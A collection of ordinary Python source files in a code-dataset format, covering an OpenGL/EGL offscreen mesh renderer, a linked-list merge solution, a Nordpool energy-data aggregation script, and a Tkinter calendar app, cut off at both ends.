_USE_EGL_OFFSCREEN:\n if self._window:\n self._window.switch_to()\n\n\n def _init_pyglet(self):\n import pyglet\n pyglet.options['shadow_window'] = False\n\n self._window = None\n conf = pyglet.gl.Config(\n depth_size=24,\n double_buffer=True,\n major_version=3,\n minor_version=2\n )\n try:\n self._window = pyglet.window.Window(config=conf, visible=False,\n resizable=False, width=1, height=1)\n except Exception as e:\n raise ValueError('Failed to initialize Pyglet window with an OpenGL >= 3+ context. ' \\\n 'If you\\'re logged in via SSH, ensure that you\\'re running your script ' \\\n 'with vglrun (i.e. VirtualGL). Otherwise, the internal error message was: ' \\\n '\"{}\"'.format(e.message))\n\n def _init_egl(self):\n from OpenGL.EGL import EGL_SURFACE_TYPE, EGL_PBUFFER_BIT, EGL_BLUE_SIZE, \\\n EGL_RED_SIZE, EGL_GREEN_SIZE, EGL_DEPTH_SIZE, \\\n EGL_COLOR_BUFFER_TYPE, EGL_RGB_BUFFER, EGL_HEIGHT, \\\n EGL_RENDERABLE_TYPE, EGL_OPENGL_BIT, EGL_CONFORMANT, \\\n EGL_OPENGL_BIT, EGL_CONFIG_CAVEAT, EGL_NONE, \\\n EGL_DEFAULT_DISPLAY, EGL_NO_CONTEXT, EGL_WIDTH, \\\n EGL_OPENGL_API, \\\n eglGetDisplay, eglInitialize, eglChooseConfig, \\\n eglBindAPI, eglCreatePbufferSurface, \\\n eglCreateContext, eglMakeCurrent, EGLConfig\n\n self._egl_display = None\n self._egl_surface = None\n self._egl_context = None\n\n config_attributes = arrays.GLintArray.asArray([\n EGL_SURFACE_TYPE, EGL_PBUFFER_BIT,\n EGL_BLUE_SIZE, 8,\n EGL_RED_SIZE, 8,\n EGL_GREEN_SIZE, 8,\n EGL_DEPTH_SIZE, 24,\n EGL_COLOR_BUFFER_TYPE, EGL_RGB_BUFFER,\n EGL_RENDERABLE_TYPE, EGL_OPENGL_BIT,\n EGL_CONFORMANT, EGL_OPENGL_BIT,\n EGL_NONE\n ])\n major, minor = ctypes.c_long(), ctypes.c_long()\n num_configs = ctypes.c_long()\n configs = (EGLConfig*1)()\n\n # Cache DISPLAY if necessary and get an off-screen EGL display\n orig_dpy = None\n if 'DISPLAY' in os.environ:\n orig_dpy = os.environ['DISPLAY']\n del os.environ['DISPLAY']\n self._egl_display = eglGetDisplay(EGL_DEFAULT_DISPLAY)\n if orig_dpy is not None:\n os.environ['DISPLAY'] = orig_dpy\n\n # Initialize EGL\n eglInitialize(self._egl_display, major, minor)\n eglChooseConfig(self._egl_display, config_attributes, configs, 1, num_configs)\n\n # Bind EGL to the OpenGL API\n eglBindAPI(EGL_OPENGL_API)\n\n # Create an EGL pbuffer\n self._egl_surface = eglCreatePbufferSurface(self._egl_display, configs[0],\n [EGL_WIDTH, self._width, EGL_HEIGHT, self._height, EGL_NONE])\n\n # Create an EGL context\n self._egl_context = eglCreateContext(self._egl_display, configs[0], EGL_NO_CONTEXT, None)\n\n # Make the EGL context current\n eglMakeCurrent(self._egl_display, self._egl_surface, self._egl_surface, self._egl_context)\n\n @property\n def scene(self):\n return self._scene()\n\n @scene.setter\n def scene(self, s):\n self._scene = weakref.ref(s)\n\n def render(self, render_color=True, front_and_back=False):\n \"\"\"Render raw images of the scene.\n\n Parameters\n ----------\n render_color : bool\n If True, both a color and a depth image are returned.\n If False, only a depth image is returned.\n\n front_and_back : bool\n If True, all normals are treated as facing the camera.\n\n Returns\n -------\n tuple of (h, w, 3) uint8, (h, w) float32\n A raw RGB color image with pixel values in [0, 255] and a depth image\n with true depths expressed as floats. If render_color was False,\n only the depth image is returned.\n\n Note\n -----\n This function can be called repeatedly, regardless of changes to the scene\n (i.e. moving SceneObjects, adding and removing lights, moving the camera).\n However, adding or removing objects causes a new OpenGL context to be created,\n so put all the objects in the scene before calling it.\n\n Note\n ----\n Values listed as 0.0 in the depth image are actually at infinity\n (i.e. no object present at that pixel).\n \"\"\"\n self._make_gl_context_current()\n\n # Reload the frame buffers if the width or height of the camera changed\n width = self.scene.camera.intrinsics.width\n height = self.scene.camera.intrinsics.height\n if width != self._width or height != self._height:\n self._width = width\n self._height = height\n self._bind_frame_buffer()\n\n if render_color:\n return self._color_and_depth(front_and_back)\n else:\n return self._depth()\n\n def close(self):\n \"\"\"Destroy the OpenGL context attached to this renderer.\n\n Warning\n -------\n Once this has been called, the OpenGLRenderer object should be discarded.\n \"\"\"\n # Delete shaders\n if self._full_shader:\n glDeleteProgram(self._full_shader)\n self._full_shader = None\n if self._depth_shader:\n glDeleteProgram(self._depth_shader)\n self._depth_shader = None\n\n # Delete all mesh geometry\n if self._buffers:\n glDeleteBuffers(len(self._buffers), self._buffers)\n self._buffers = None\n\n # Delete framebuffers and renderbuffers\n if self._colorbuf and self._depthbuf:\n glDeleteRenderbuffers(2, [self._colorbuf, self._depthbuf])\n self._colorbuf = None\n self._depthbuf = None\n\n if self._framebuf:\n glDeleteFramebuffers(1, [self._framebuf])\n self._framebuf = None\n\n OpenGL.contextdata.cleanupContext()\n if _USE_EGL_OFFSCREEN:\n from OpenGL.EGL import eglDestroySurface, eglDestroyContext, eglTerminate\n if self._egl_display is not None:\n if self._egl_context is not None:\n eglDestroyContext(self._egl_display, self._egl_context)\n self._egl_context = None\n if self._egl_surface:\n eglDestroySurface(self._egl_display, self._egl_surface)\n self._egl_surface = None\n eglTerminate(self._egl_display)\n self._egl_display = None\n else:\n if self._window is not None:\n try:\n self._window.context.destroy()\n self._window.close()\n except:\n pass\n self._window = None\n\n def _bind_frame_buffer(self):\n \"\"\"Bind the frame buffer for offscreen rendering.\n \"\"\"\n # Release the color and depth buffers if they exist:\n if self._framebuf is not None:\n glDeleteRenderbuffers(2, [self._colorbuf, self._depthbuf])\n glDeleteFramebuffers(1, [self._framebuf])\n\n # Initialize the Framebuffer into which we will perform off-screen rendering\n self._colorbuf, self._depthbuf = glGenRenderbuffers(2)\n glBindRenderbuffer(GL_RENDERBUFFER, self._colorbuf)\n glRenderbufferStorage(GL_RENDERBUFFER, GL_RGBA, self._width, self._height)\n glBindRenderbuffer(GL_RENDERBUFFER, self._depthbuf)\n glRenderbufferStorage(GL_RENDERBUFFER, GL_DEPTH_COMPONENT24, self._width, self._height)\n\n self._framebuf = glGenFramebuffers(1)\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, self._framebuf)\n glFramebufferRenderbuffer(GL_DRAW_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_RENDERBUFFER, self._colorbuf)\n glFramebufferRenderbuffer(GL_DRAW_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_RENDERBUFFER, self._depthbuf)\n\n def _load_shaders(self, vertex_shader, fragment_shader):\n \"\"\"Load and compile shaders from strings.\n \"\"\"\n shader = shaders.compileProgram(\n shaders.compileShader(vertex_shader, GL_VERTEX_SHADER),\n shaders.compileShader(fragment_shader, GL_FRAGMENT_SHADER)\n )\n\n return shader\n\n def _load_meshes(self):\n \"\"\"Load the scene's meshes into vertex buffers.\n \"\"\"\n VA_ids = glGenVertexArrays(len(self.scene.objects))\n self._buffers = []\n\n if len(self.scene.objects) == 1:\n VA_ids = [VA_ids]\n\n null = C_VOID_PS[0]\n for VA_id, obj in zip(VA_ids, self.scene.objects.values()):\n mesh = obj.mesh\n material = obj.material\n\n glBindVertexArray(VA_id)\n\n if material.smooth:\n # If smooth is True, we use indexed element arrays and set only one normal per vertex.\n\n # Set up the vertex VBO\n vertexbuffer = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, vertexbuffer)\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, null)\n glBufferData(GL_ARRAY_BUFFER,\n 4*3*len(mesh.vertices),\n np.array(mesh.vertices.flatten(), dtype=np.float32),\n GL_STATIC_DRAW)\n\n # Set up the normal VBO\n normalbuffer = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, normalbuffer)\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 0, null)\n glBufferData(GL_ARRAY_BUFFER,\n 4*3*len(mesh.vertex_normals),\n np.array(mesh.vertex_normals.flatten(), dtype=np.float32),\n GL_STATIC_DRAW)\n\n # Set up the element index buffer\n elementbuffer = glGenBuffers(1)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, elementbuffer)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER,\n 4*3*len(mesh.faces),\n np.array(mesh.faces.flatten(), dtype=np.int32),\n GL_STATIC_DRAW)\n self._buffers.extend([vertexbuffer, elementbuffer, normalbuffer])\n else:\n # If smooth is False, we treat each triangle independently\n # and set vertex normals to corresponding face normals.\n\n # Set up the vertices\n vertexbuffer = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, vertexbuffer)\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, null)\n glBufferData(GL_ARRAY_BUFFER,\n 4*3*3*len(mesh.triangles),\n np.array(mesh.triangles.flatten(), dtype=np.float32),\n GL_STATIC_DRAW)\n\n # Set up the normals\n normalbuffer = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, normalbuffer)\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 0, null)\n normals = np.repeat(mesh.face_normals, 3, axis=0).astype(np.float32)\n normals = normals.flatten()\n glBufferData(GL_ARRAY_BUFFER,\n 4*len(normals),\n normals,\n GL_STATIC_DRAW)\n\n self._buffers.extend([vertexbuffer, normalbuffer])\n\n glVertexAttribDivisor(0, 0)\n glVertexAttribDivisor(1, 0)\n\n # Set up model matrix buffer\n modelbuf = glGenBuffers(1)\n self._buffers.extend([modelbuf])\n glBindBuffer(GL_ARRAY_BUFFER, modelbuf)\n for i in range(4):\n glEnableVertexAttribArray(2 + i)\n glVertexAttribPointer(2 + i, 4, GL_FLOAT, GL_FALSE, 4*16, C_VOID_PS[i])\n glVertexAttribDivisor(2 + i, 1)\n\n if isinstance(obj, InstancedSceneObject):\n glBufferData(GL_ARRAY_BUFFER, 4*16*len(obj.poses), None, GL_STATIC_DRAW)\n data = obj.raw_pose_data.flatten().astype(np.float32)\n glBufferSubData(GL_ARRAY_BUFFER, 0, 4*16*len(obj.poses), data)\n else:\n glBufferData(GL_ARRAY_BUFFER, 4*16, None, GL_STATIC_DRAW)\n glBufferSubData(GL_ARRAY_BUFFER, 0, 4*16, np.eye(4).flatten().astype(np.float32))\n\n # Set up color buffer\n colorbuf = glGenBuffers(1)\n self._buffers.extend([colorbuf])\n glBindBuffer(GL_ARRAY_BUFFER, colorbuf)\n glEnableVertexAttribArray(6)\n glVertexAttribPointer(6, 3, GL_FLOAT, GL_FALSE, 0, C_VOID_PS[0])\n glVertexAttribDivisor(6, 1)\n\n if isinstance(obj, InstancedSceneObject):\n glBufferData(GL_ARRAY_BUFFER, 4*3*len(obj.colors), None, GL_STATIC_DRAW)\n data = obj.colors.flatten().astype(np.float32)\n glBufferSubData(GL_ARRAY_BUFFER, 0, 4*3*len(obj.colors), data)\n else:\n glBufferData(GL_ARRAY_BUFFER, 4*3, None, GL_STATIC_DRAW)\n glBufferSubData(GL_ARRAY_BUFFER, 0, 4*3, obj.material.color.astype(np.float32))\n\n # Unbind all buffers\n glBindVertexArray(0)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)\n\n return VA_ids\n\n def _depth(self):\n \"\"\"Render a depth image of the scene.\n \"\"\"\n camera = self.scene.camera\n width = camera.intrinsics.width\n height = camera.intrinsics.height\n\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, self._framebuf)\n glViewport(0, 0, width, height)\n\n glClearColor(0.0, 0.0, 0.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glUseProgram(self._depth_shader)\n\n # Get Uniform Locations from Shader\n v_id = glGetUniformLocation(self._depth_shader, 'V')\n p_id = glGetUniformLocation(self._depth_shader, 'P')\n m_id = glGetUniformLocation(self._depth_shader, 'M')\n\n glUniformMatrix4fv(v_id, 1, GL_TRUE, camera.V)\n glUniformMatrix4fv(p_id, 1, GL_TRUE, camera.P)\n\n for vaid, obj in zip(self._vaids, self.scene.objects.values()):\n if not obj.enabled:\n continue\n material = obj.material\n mesh = obj.mesh\n\n glUniformMatrix4fv(m_id, 1, GL_TRUE, obj.T_obj_world.matrix)\n\n glBindVertexArray(vaid)\n\n n_instances = 1\n if isinstance(obj, InstancedSceneObject):\n n_instances = obj.n_instances\n\n if material.smooth:\n glDrawElementsInstanced(GL_TRIANGLES, 3*len(mesh.faces), GL_UNSIGNED_INT, C_VOID_PS[0], n_instances)\n else:\n glDrawArraysInstanced(GL_TRIANGLES, 0, 3*len(mesh.faces), n_instances)\n\n glBindVertexArray(0)\n\n glUseProgram(0)\n\n glFlush()\n\n # Extract the z buffer\n glBindFramebuffer(GL_READ_FRAMEBUFFER, self._framebuf)\n depth_buf = (GLfloat * (width * height))(0)\n glReadPixels(0, 0, width, height, GL_DEPTH_COMPONENT, GL_FLOAT, depth_buf)\n\n # Re-format it into a numpy array\n depth_im = np.frombuffer(depth_buf, dtype=np.float32).reshape((height, width))\n depth_im = np.flip(depth_im, axis=0)\n inf_inds = (depth_im == 1.0)\n depth_im = 2.0 * depth_im - 1.0\n z_near, z_far = camera.z_near, camera.z_far\n depth_im = 2.0 * z_near * z_far / (z_far + z_near - depth_im * (z_far - z_near))\n depth_im[inf_inds] = 0.0\n\n return depth_im\n\n def _color_and_depth(self, front_and_back):\n \"\"\"Render a color image and a depth image of the scene.\n \"\"\"\n scene = self.scene\n camera = scene.camera\n width = camera.intrinsics.width\n height = camera.intrinsics.height\n\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, self._framebuf)\n glViewport(0, 0, width, height)\n\n glClearColor(.93, .93, 1, 1)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glUseProgram(self._full_shader)\n\n # Get Uniform Locations from Shader\n p_id = glGetUniformLocation(self._full_shader, 'P')\n v_id = glGetUniformLocation(self._full_shader, 'V')\n m_id = glGetUniformLocation(self._full_shader, 'M')\n matprop_id = glGetUniformLocation(self._full_shader, 'material_properties')\n ambient_id = glGetUniformLocation(self._full_shader, 'ambient_light_info')\n directional_id = glGetUniformLocation(self._full_shader, \"directional_light_info\")\n n_directional_id = glGetUniformLocation(self._full_shader, \"n_directional_lights\")\n point_id = glGetUniformLocation(self._full_shader, \"point_light_info\")\n n_point_id = glGetUniformLocation(self._full_shader, \"n_point_lights\")\n front_and_back_id = glGetUniformLocation(self._full_shader, \"front_and_back\")\n\n # Bind bad normals id\n glUniform1i(front_and_back_id, int(front_and_back))\n\n # Bind view matrix\n glUniformMatrix4fv(v_id, 1, GL_TRUE, scene.camera.V)\n glUniformMatrix4fv(p_id, 1, GL_TRUE, scene.camera.P)\n\n # Bind ambient lighting\n glUniform4fv(ambient_id, 1, np.hstack((scene.ambient_light.color,\n scene.ambient_light.strength)))\n\n # Bind directional lighting\n glUniform1i(n_directional_id, len(scene.directional_lights))\n directional_info = np.zeros((2*MAX_N_LIGHTS, 4))\n for i, dlight in enumerate(scene.directional_lights):\n directional_info[2*i,:] = np.hstack((dlight.color, dlight.strength))\n directional_info[2*i+1,:] = np.hstack((dlight.direction, 0))\n glUniform4fv(directional_id, 2*MAX_N_LIGHTS, directional_info.flatten())\n\n # Bind point lighting\n glUniform1i(n_point_id, len(scene.point_lights))\n point_info = np.zeros((2*MAX_N_LIGHTS, 4))\n for i, plight in enumerate(scene.point_lights):\n point_info[2*i,:] = np.hstack((plight.color, plight.strength))\n point_info[2*i+1,:] = np.hstack((plight.location, 1))\n glUniform4fv(point_id, 2*MAX_N_LIGHTS, point_info.flatten())\n\n for vaid, obj in zip(self._vaids, scene.objects.values()):\n if not obj.enabled:\n continue\n\n mesh = obj.mesh\n material = obj.material\n\n glBindVertexArray(vaid)\n\n glUniformMatrix4fv(m_id, 1, GL_TRUE, obj.T_obj_world.matrix)\n glUniform4fv(matprop_id, 1, np.array([material.k_a, material.k_d, material.k_s, material.alpha]))\n\n if material.wireframe:\n glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n else:\n glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)\n\n n_instances = 1\n if isinstance(obj, InstancedSceneObject):\n n_instances = obj.n_instances\n\n if material.smooth:\n glDrawElementsInstanced(GL_TRIANGLES, 3*len(mesh.faces), GL_UNSIGNED_INT, C_VOID_PS[0], n_instances)\n else:\n glDrawArraysInstanced(GL_TRIANGLES, 0, 3*len(mesh.faces), n_instances)\n\n glBindVertexArray(0)\n\n glUseProgram(0)\n\n glFlush()\n\n # Extract the color and depth buffers\n glBindFramebuffer(GL_READ_FRAMEBUFFER, self._framebuf)\n color_buf = glReadPixels(0, 0, width, height, GL_RGB, GL_UNSIGNED_BYTE)\n depth_buf = glReadPixels(0, 0, width, height, GL_DEPTH_COMPONENT, GL_FLOAT)\n\n # Re-format them into numpy arrays\n color_im = np.frombuffer(color_buf, dtype=np.uint8).reshape((height, width, 3))\n color_im = np.flip(color_im, axis=0)\n\n depth_im = np.frombuffer(depth_buf, dtype=np.float32).reshape((height, width))\n depth_im = np.flip(depth_im, axis=0)\n inf_inds = (depth_im == 1.0)\n depth_im = 2.0 * depth_im - 1.0\n z_near, z_far = camera.z_near, camera.z_far\n depth_im = 2.0 * z_near * z_far / (z_far + z_near - depth_im * (z_far - z_near))\n depth_im[inf_inds] = 0.0\n\n return color_im, depth_im\n\n def __del__(self):\n self.close()\n\n","repo_name":"BerkeleyAutomation/meshrender","sub_path":"meshrender/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":23126,"program_lang":"python","lang":"en","doc_type":"code","stars":132,"dataset":"github-code","pt":"72"} +{"seq_id":"35492120239","text":"#21_Merge Two Sorted Lists\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n ls1, ls2=l1, l2\n ls=ListNode(None)\n head=ListNode(None)\n head.next=ls\n \n while ls1 and ls2:\n if ls1.val1:\n # As long as we have more than 1 xls, we \n # process it\n create_concat(join(root,folder),dest_path) \n else:\n pass\n elif folder == 'hydro_reservoir':\n handle_hydro(join(root,folder),dest_path) \n else:\n skipped.append(str(folder))\n # logger.info('Skipping folder ' + str(folder)) \n else:\n skipped.append(str(root.split('/')[-1]))\n # logger.info('Skipping folder ' + str(root.split('/')[-1]))\n \n if len(skipped):\n logger.info('We skipped the following folders: ' + str(skipped))\n else:\n logger.info('No folders were skipped')\n \n logger.info('Finished Nordpool yearly aggregation')\n logger.info('----------------------------------------------------------')\n\ndef join(path1, path2):\n '''\n We join two paths\n '''\n \n if path1[-1] == '/':\n return path1 + path2\n else:\n return path1 + '/' + path2\n \ndef handle_hydro(h_dir, dest_path): \n '''\n We handle hydro data:\n Hydro data is also in weird format and cannot be handled automatically \n and also has nly weekly data. I had to generate the csv files manually \n and then combine them. \n \n Inputs:\n - h_dir: Directory of our raw hydro data\n - dest_path: Directory where we want to store combined hydro-data\n '''\n \n #need to handle hydro data differently as it fails on automated aggregation\n #created csv files manually from hydro xls files\n hydro_df = []\n # h_dir = '/home/leon/Documents/think_outside/Omdena-think_outside_repo/NordPool_data/hydro_reservoir'\n for file in os.listdir(h_dir):\n # logger.info(str(file))\n if file[-3:] == 'csv':\n temp_df = pd.read_csv(join(h_dir,file),header=1)\n temp_df['week'] = temp_df['Unnamed: 0'].apply(lambda x: x.strip(' ').split('-')[0]) #get week and year\n temp_df['year'] = temp_df['Unnamed: 0'].apply(lambda x: x.strip(' ').split('-')[1])\n temp_df = temp_df[['week', 'year','NO', 'SE', 'FI']]\n hydro_df.append(temp_df)\n \n hydro_concat = pd.concat(hydro_df)\n hydro_concat = hydro_concat.sort_values(by = ['year', 'week'], ascending = [True, True]).reset_index(drop=True)\n hydro_concat.head()\n \n filename = 'concat_hydro_reservoir_weekly.csv'\n store_df_to_csv(hydro_concat, join(dest_path, filename), filename)\n hydro_concat.to_csv()\n\ndef read_file(input_file):\n '''\n Reads xls file into df\n '''\n\n temp_df = pd.read_html(input_file,decimal=',',thousands='') #returns list of dataframes\n temp_df = temp_df[0] #select df of interest\n x = 0\n for x in range(10):# we try to get the level values from the multi-index until an error is thrown, then we use x-1 to get the data\n try:\n temp_df.columns.get_level_values(x)\n except:\n break\n \n temp_df.columns = temp_df.columns.get_level_values(x-1)\n \n temp_df = temp_df.rename(columns={temp_df.columns[0]: \"date\"}) #name date column\n \n if ('Hours' in temp_df.columns.values) == True: #if hours include hours in datetime else just use date\n temp_df['datetime'] = temp_df['date'] + ' ' + temp_df['Hours'].apply(lambda x: x[0:2]) +':00'\n temp_df = temp_df.drop(columns=['date','Hours'])\n temp_df['datetime'] = pd.to_datetime(temp_df['datetime'].values,format='%d-%m-%Y %H:%M') #convert to datetime\n \n else: \n temp_df['datetime'] = temp_df['date'] \n temp_df = temp_df.drop(columns=['date'])\n temp_df['datetime'] = pd.to_datetime(temp_df['datetime'].values,format='%d-%m-%Y') #convert to datetime\n \n temp_df = temp_df.set_index('datetime')\n# temp_df = temp_df.sort_index(ascending=True) #sort from earliest to latest , handled during concat for efficiency\n \n return temp_df\n\n\ndef read_file_elbas_vol(input_file):\n '''\n We need a different function to read the elbas_volume_daily files \n as they are very inconsistent in both format and numberof columns.\n '''\n temp_df = pd.read_html(input_file,decimal=',',thousands='') #returns list of dataframes\n temp_df = temp_df[0] #select df of interest\n x = 0\n for x in range(10):# we try to get the level values from the multi-index until an error is thrown, then we use x-1 to get the data\n try:\n temp_cols = temp_df.columns.get_level_values(x)\n if temp_cols[1] == 'NO1': #we look through the multi-index until we get to the level with NO1 column names\n break\n else:\n pass\n except:\n break\n \n temp_df.columns = temp_df.columns.get_level_values(x)\n new_cols = temp_df.columns.values\n \n #we want to add back in the buy and sell information to the column names which was lost earlier\n \n for col in range(len(new_cols)):#loop through column names\n if new_cols[col] == 'datetime': #ignore datetime columns\n pass\n if col % 2 == 0:\n new_cols[col] = str(temp_df.columns.values[col]) + '_sell'\n else:\n new_cols[col] = str(temp_df.columns.values[col]) + '_buy'\n \n\n temp_df = temp_df.rename(columns={temp_df.columns[0]: \"date\"}) #name date column\n \n #update column names\n for col in range(len(new_cols)): \n if col == 0:\n pass\n else:\n temp_df = temp_df.rename(columns={temp_df.columns[col]: new_cols[col]})\n \n\n if ('Hours' in temp_df.columns.values) == True: #if hours include hours in datetime else just use date\n temp_df['datetime'] = temp_df['date'] + ' ' + temp_df['Hours'].apply(lambda x: x[0:2]) +':00'\n temp_df = temp_df.drop(columns=['date','Hours'])\n temp_df['datetime'] = pd.to_datetime(temp_df['datetime'].values,format='%d-%m-%Y %H:%M')\n \n else: \n temp_df['datetime'] = temp_df['date'] \n temp_df = temp_df.drop(columns=['date'])\n temp_df['datetime'] = pd.to_datetime(temp_df['datetime'].values,format='%d-%m-%Y')\n \n \n temp_df = temp_df.set_index('datetime')\n temp_df = temp_df.sort_index(ascending=True) #sort from earliest to latest , handled during concat for efficiency\n \n return temp_df\n\n\ndef concat_files_folder(folder):\n '''\n Will concat all xls files in a folder into pandas dataframe\n '''\n files = os.listdir(folder) #get list of files in folder\n df_list = []\n files_list = []\n for file_number in range(len(files)): #loop through files\n if files[file_number][-3:] == 'xls': #only read xls files\n files_list.append(str(files[file_number]))\n # logger.info('Reading ' + str(files[file_number]))\n #use different function for elbas volume daily\n if folder.split('/')[-1] == 'elbas_volume_daily': #check if folder is troublesome folder\n try: \n # logger.info('alternate function selected')\n df = read_file_elbas_vol(join(folder,files[file_number]))\n except:\n # logger.info('reverting to normal function')\n df = read_file(join(folder,files[file_number]))\n else:\n df = read_file(join(folder,files[file_number])) #read file from path\n # logger.info(str(files[file_number]) + ' read ok')\n df_list.append(df)\n else:\n pass\n \n if len(files_list) > 0:\n logger.info('Merged the following files together: ' + str(files_list))\n try:\n concat_df = pd.concat(df_list)\n except:\n logger.warning('Could not run concat of our dataframes. Should this' +\n ' folder consider read_file_elbas_vol ' +\n 'function instead?')\n concat_df = pd.concat(df_list)\n \n concat_df = concat_df.sort_index(ascending=True)\n \n return concat_df\n\n\ndef create_concat(input_folder,dest_path):\n '''\n Runs through files, makes pandas df and then saves as csv into same \n folder\n '''\n \n # Look at working directory and get current folder\n current_folder = input_folder.split('/')[-1] \n \n concat_df = concat_files_folder(input_folder) #concat all xls files within folder\n newfilename = 'concat_' + current_folder + '.csv'#generate new filename\n csv_path = join(dest_path,newfilename)\n store_df_to_csv(concat_df, csv_path, newfilename)\n\n return concat_df\n\ndef store_df_to_csv(df, csv_path, filename):\n '''\n We store our df to a csv\n '''\n if os.path.isfile(csv_path):\n logger.info(str(filename) + ' created successfully by ' + \n 'over-writing previous existing one')\n else:\n logger.info(str(filename) + ' created successfully by creating' +\n ' new file (file did not exist previously)')\n \n df.to_csv(csv_path) #save as csv in specific folder\n \n","repo_name":"LHamnett/Data_Science_and_Machine_Learning_projects","sub_path":"Preprocessing/Energy_price_data_preprocessing/nordpool_merging.py","file_name":"nordpool_merging.py","file_ext":"py","file_size_in_byte":10657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8607184151","text":"import calendar\nimport datetime\nimport logging\nfrom tkinter import *\n\n\nclass MyCalendar:\n\n def __init__(self, title=\"Календарь\", icopath='../resources/calendar.ico', holidaypath='../holi.txt'):\n \"\"\"\n Class MyCalendar implements calendar with user-friendly interface\n :param title: liable of application\n :param icopath: path to icon of application\n :param holidaypath: path to file with holidays or where create it\n \"\"\"\n f = open(holidaypath, 'a')\n f.close()\n\n self.root = Tk()\n self.root.title(title)\n self.root.resizable(False, False)\n self.days = []\n self.holidays = []\n\n self.now = datetime.datetime.now()\n self.year = self.now.year\n self.month = self.now.month\n\n self.back_button = Button(self.root, text=\"<\", command=self._back)\n self.back_button.grid(row=0, column=0, sticky=NSEW)\n self.next_button = Button(self.root, text=\">\", command=self._next)\n self.next_button.grid(row=0, column=6, sticky=NSEW)\n\n self.add_hol_area = Text(self.root, width=10, height=1, bg='white',\n font=(\"Arial 16 bold\", 12), fg='black', wrap=CHAR)\n self.add_hol_area.grid(row=9, column=2, columnspan=3, sticky=NSEW)\n self.add_hol_btn = Button(self.root, text=\"Add holiday\", command=self._add_holi)\n self.add_hol_btn.grid(row=10, column=2, columnspan=3, sticky=NSEW)\n\n self.rem_hol_btn = Button(self.root, text=\"Remove holiday\", command=self._rem_holi)\n self.rem_hol_btn.grid(row=11, column=2, columnspan=3, sticky=NSEW)\n\n self.info_label = Label(self.root, text='0', width=1, height=1, font='Arial 16 bold', fg='blue')\n self.info_label.grid(row=0, column=1, columnspan=5, sticky=NSEW)\n\n try:\n self.root.iconbitmap(icopath)\n except:\n logging.error(\"Ico not found...\")\n\n self.holipath = holidaypath\n self._fill()\n\n def _back(self):\n \"\"\"\n return calendar to prev month\n :return: void\n \"\"\"\n self.month -= 1\n\n if self.month == 0:\n self.month = 12\n self.year -= 1\n\n self._fill()\n\n def _next(self):\n \"\"\"\n return calendar to next month\n :return: void\n \"\"\"\n self.month += 1\n\n if self.month == 13:\n self.month = 1\n self.year += 1\n\n self._fill()\n\n def _fill(self):\n \"\"\"\n fill all square with data and coloring it\n :return: void\n \"\"\"\n self.add_hol_area.delete('1.0', END)\n self.days.clear()\n self._reload_holidays()\n\n for n in range(7):\n lbl = Label(self.root, text=calendar.day_abbr[n], width=1, height=1, font='Arial 10 bold', fg='darkblue')\n lbl.grid(row=1, column=n, sticky=NSEW)\n\n for row in range(6):\n for col in range(7):\n if col == 5 or col == 6:\n lbl = Label(self.root, text='0', width=4, height=2, font='Arial 16 bold', bg='red')\n else:\n lbl = Label(self.root, text='0', width=4, height=2, font='Arial 16 bold')\n lbl.grid(row=row + 2, column=col, sticky=NSEW)\n self.days.append(lbl)\n\n self.info_label['text'] = calendar.month_name[self.month] + ',' + str(self.year)\n month_days = calendar.monthrange(self.year, self.month)[1]\n\n if self.month == 1:\n back_monts_days = calendar.monthrange(self.year - 1, 12)[1]\n else:\n back_monts_days = calendar.monthrange(self.year, self.month - 1)[1]\n\n week_day = calendar.monthrange(self.year, self.month)[0]\n\n for n in range(month_days):\n self.days[week_day + n]['text'] = n + 1\n self.days[week_day + n]['fg'] = 'black'\n if self.year == self.now.year and self.month == self.now.month and n == self.now.day - 1:\n self.days[week_day + n]['bg'] = 'green'\n else:\n if self.days[week_day + n]['bg'] == 'red':\n continue\n else:\n self.days[week_day + n]['bg'] = '#d2d2d2'\n\n for elem in self.holidays:\n if int(elem[0]) == self.month and self.days[week_day + int(elem[1]) - 1]['bg'] != 'green':\n self.days[week_day + int(elem[1]) - 1]['bg'] = 'red'\n\n for n in range(week_day):\n self.days[week_day - n - 1]['text'] = back_monts_days - n\n self.days[week_day - n - 1]['fg'] = 'grey'\n if self.days[week_day - n - 1]['bg'] == 'red':\n self.days[week_day - n - 1]['bg'] = '#a10000'\n continue\n self.days[week_day - n - 1]['bg'] = '#f3f3f3'\n\n for elem in self.holidays:\n if int(elem[0]) == self.month - 1 and week_day - back_monts_days + int(elem[1]) - 1 > -1:\n self.days[week_day - back_monts_days + int(elem[1]) - 1]['bg'] = '#a10000'\n\n for n in range(6 * 7 - month_days - week_day):\n self.days[week_day + n + month_days]['text'] = n + 1\n if self.days[week_day + n + month_days]['bg'] == 'red':\n self.days[week_day + n + month_days]['bg'] = '#a10000'\n continue\n self.days[week_day + n + 